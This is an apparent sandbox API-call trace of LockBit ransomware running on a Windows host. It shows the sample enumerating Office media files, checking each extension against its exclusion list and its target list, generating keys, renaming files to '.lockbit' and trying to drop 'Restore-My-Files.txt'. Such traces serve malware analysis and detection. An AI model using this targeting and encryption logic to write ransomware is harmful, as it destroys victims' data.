BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0199.437] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.437] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.437] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0199.437] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0199.442] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0302827.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0302827.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.442] malloc (_Size=0xa2) returned 0x1fa2ed8 [0199.442] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0199.444] free (_Block=0x1fa2ed8) [0199.444] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0302827.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0199.444] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0199.444] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.444] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33a69b00, ftCreationTime.dwHighDateTime=0x1bf4b65, ftLastAccessTime.dwLowDateTime=0xbd6b5ec0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x33a69b00, ftLastWriteTime.dwHighDateTime=0x1bf4b65, nFileSizeHigh=0x0, nFileSizeLow=0x25c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0302953.JPG", cAlternateFileName="")) returned 1 [0199.444] lstrcmpiW (lpString1=".", lpString2="J0302953.JPG") returned -1 [0199.444] lstrcmpiW (lpString1="..", lpString2="J0302953.JPG") returned -1 [0199.444] PathFindExtensionW (pszPath="J0302953.JPG") returned=".JPG" [0199.444] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0199.444] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0199.444] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0199.444] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0199.445] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0199.445] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0199.445] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0199.445] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0199.445] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0199.445] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0199.445] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0199.445] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0199.445] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0199.445] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0199.445] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0199.445] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0199.445] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0199.445] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0199.445] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0199.445] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0199.445] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0199.445] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0199.445] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0199.445] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0199.445] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0199.446] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0199.446] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0199.446] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0199.446] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0199.446] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0199.446] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0199.446] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0199.446] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0199.446] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0199.446] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0199.446] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0199.446] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0199.446] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0199.446] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0199.446] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0199.446] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0199.446] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0199.446] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0199.446] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0199.446] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0199.446] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0199.446] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0199.446] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0302953.JPG") returned 1 [0199.447] lstrcmpiW (lpString1="ntldr", lpString2="J0302953.JPG") returned 1 [0199.447] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0302953.JPG") returned 1 [0199.447] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0302953.JPG") returned -1 [0199.447] lstrcmpiW (lpString1="autorun.inf", lpString2="J0302953.JPG") returned -1 [0199.447] lstrcmpiW (lpString1="thumbs.db", lpString2="J0302953.JPG") returned 1 [0199.447] lstrcmpiW (lpString1="iconcache.db", lpString2="J0302953.JPG") returned -1 [0199.447] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0199.447] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0302953.JPG") returned=".JPG" [0199.447] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0199.447] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0199.447] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0199.447] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0199.447] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0199.447] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0199.447] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0199.447] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0199.447] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0199.447] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0199.447] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0199.447] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0199.447] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0199.447] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0199.448] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0199.448] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0199.448] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0199.448] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0199.448] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0199.448] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0199.448] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0199.448] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0199.448] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0199.448] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0199.448] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0199.448] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0199.448] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0199.448] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0199.448] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0302953.JPG.lockbit") returned 70 [0199.448] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0302953.JPG" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0302953.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0199.450] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.450] malloc (_Size=0x40068) returned 0x3ef0008 [0199.450] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=9665) returned 1 [0199.450] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.451] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.451] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0199.451] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.451] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.451] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0199.451] ReadFile (in: hFile=0x308, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0199.459] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0302953.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0302953.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.459] malloc (_Size=0xa2) returned 0x1fa2ed8 [0199.459] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0199.461] free (_Block=0x1fa2ed8) [0199.461] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0302953.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0199.461] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0199.461] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.461] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa04dd00, ftCreationTime.dwHighDateTime=0x1bf4531, ftLastAccessTime.dwLowDateTime=0xbd6b5ec0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xfa04dd00, ftLastWriteTime.dwHighDateTime=0x1bf4531, nFileSizeHigh=0x0, nFileSizeLow=0x4d84, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0304933.WMF", cAlternateFileName="")) returned 1 [0199.461] lstrcmpiW (lpString1=".", lpString2="J0304933.WMF") returned -1 [0199.461] lstrcmpiW (lpString1="..", lpString2="J0304933.WMF") returned -1 [0199.461] PathFindExtensionW (pszPath="J0304933.WMF") returned=".WMF" [0199.461] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0199.461] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0199.461] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0199.461] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0199.461] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0199.461] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0199.461] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0199.461] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0199.461] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0199.462] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0199.462] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0199.462] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0199.462] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0199.462] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0199.462] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0199.462] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0199.462] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0199.462] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0199.462] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0199.462] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0199.462] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0199.462] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0199.462] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0199.462] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0199.462] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.462] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0199.462] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0199.462] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0199.462] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0199.462] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0199.462] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0199.462] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0199.462] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0199.463] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0199.463] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0199.463] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0199.463] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0199.463] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0199.463] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0199.463] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0199.463] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0199.463] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0199.463] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.463] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0199.463] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0199.463] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0199.463] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0199.463] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0304933.WMF") returned 1 [0199.463] lstrcmpiW (lpString1="ntldr", lpString2="J0304933.WMF") returned 1 [0199.463] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0304933.WMF") returned 1 [0199.463] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0304933.WMF") returned -1 [0199.463] lstrcmpiW (lpString1="autorun.inf", lpString2="J0304933.WMF") returned -1 [0199.463] lstrcmpiW (lpString1="thumbs.db", lpString2="J0304933.WMF") returned 1 [0199.463] lstrcmpiW (lpString1="iconcache.db", lpString2="J0304933.WMF") returned -1 [0199.463] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0199.463] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0304933.WMF") returned=".WMF" [0199.463] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.464] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.464] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0199.464] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0199.464] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0199.464] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0199.464] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0199.464] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0199.464] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0199.464] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.464] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0199.464] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0199.464] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0199.464] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0199.464] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0199.464] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0199.464] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0199.464] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0199.464] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0199.464] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0199.464] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0199.464] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0199.464] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0199.464] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0199.464] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0199.465] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0199.465] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0199.465] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0199.465] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0304933.WMF.lockbit") returned 70 [0199.465] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0304933.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0304933.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0199.466] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.466] malloc (_Size=0x40068) returned 0x3df0008 [0199.467] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=19844) returned 1 [0199.467] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.467] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.467] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0199.467] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.468] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.473] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0199.473] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0199.476] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0304933.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0304933.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.476] malloc (_Size=0xa2) returned 0x1fa2ed8 [0199.476] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0199.477] free (_Block=0x1fa2ed8) [0199.477] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0304933.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0199.477] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0199.477] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.477] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ab12600, ftCreationTime.dwHighDateTime=0x1bf4533, ftLastAccessTime.dwLowDateTime=0xbd6b5ec0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x3ab12600, ftLastWriteTime.dwHighDateTime=0x1bf4533, nFileSizeHigh=0x0, nFileSizeLow=0x5af0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0305257.WMF", cAlternateFileName="")) returned 1 [0199.477] lstrcmpiW (lpString1=".", lpString2="J0305257.WMF") returned -1 [0199.477] lstrcmpiW (lpString1="..", lpString2="J0305257.WMF") returned -1 [0199.477] PathFindExtensionW (pszPath="J0305257.WMF") returned=".WMF" [0199.477] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0199.478] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0199.478] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0199.478] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0199.478] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0199.478] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0199.478] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0199.478] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0199.478] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0199.478] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0199.478] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0199.478] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0199.478] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0199.478] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0199.478] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0199.478] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0199.478] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0199.478] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0199.478] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0199.478] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0199.478] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0199.478] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0199.478] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0199.478] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0199.478] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.478] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0199.478] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0199.478] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0199.478] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0199.479] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0199.479] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0199.479] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0199.479] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0199.479] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0199.479] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0199.479] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0199.479] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0199.479] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0199.479] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0199.479] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0199.479] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0199.479] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0199.479] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.479] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0199.479] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0199.479] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0199.479] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0199.479] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0305257.WMF") returned 1 